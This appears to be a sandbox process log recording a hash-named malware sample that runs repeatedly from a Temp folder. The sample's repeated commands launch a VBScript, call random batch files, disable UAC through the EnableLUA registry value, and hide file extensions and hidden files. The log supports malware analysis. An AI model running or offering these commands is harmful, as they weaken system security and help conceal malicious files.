C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WqwYwEsU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nygskcUU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pooYkQwA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qCgsAMsc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HEcAEUMs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nokggUUE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hgQkkMAI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\foIEQQgk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HaQQgwkQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwAcgAME.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gGkIkkEA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NSIYwIYE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eucswEwo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YCEAcQII.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eMYkQcIU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lMYgoUEQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fAoUEIUM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XaEIQUMs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hoksgIww.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\twIsQMok.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

